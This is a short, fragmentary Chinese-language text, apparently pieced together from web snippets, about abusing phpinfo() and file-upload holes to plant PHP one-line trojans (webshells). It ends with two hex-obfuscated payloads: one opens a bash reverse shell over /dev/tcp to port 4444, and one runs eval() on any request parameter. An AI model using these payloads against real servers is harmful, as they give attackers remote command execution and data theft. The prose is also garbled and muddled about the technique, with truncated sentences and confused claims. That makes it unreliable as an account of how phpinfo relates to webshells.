phpinfo()函数可以被利用来创建一句话木马。 在PHP中,phpinfo()函数用于输出PHP的配置信息,包括PHP的版本、编译选项、服务器信息、环境变量等。如果网站存在未删除的phpinfo.php文件,攻击者可以利用这个文件泄露的信息来进一步攻击服务器。 一种常见的利用方式是,通过文件上传漏洞上传包含一句话木马的PHP文件
一句话木马是一种由攻击者设计用来破坏某一网站或服务器,进而非法获取服 务器数据的恶意软件,通过调用 php 中的 phpinfo 函数,可以实现一句话木马的理 想效果,获取网站的全部数据、服务器文件和配置参数。 一、实现原理 1、运行 PHP 命令:首先攻击者利用敏感页面的漏洞,将一段包含一句话木马 的 PHP 代码,植入到...
str=${system(hex2bin(ff0a2f62696e2f62617368202d6320277368202d69203e26202f6465762f7463702f3132372e302e302e312f3434343420303e263127))} // 一个一句话木马的 Payload?str=${eval(substr(hex2bin(ff6576616c28245f524551554553545b635d293b),1,19))}&c=phpinfo();...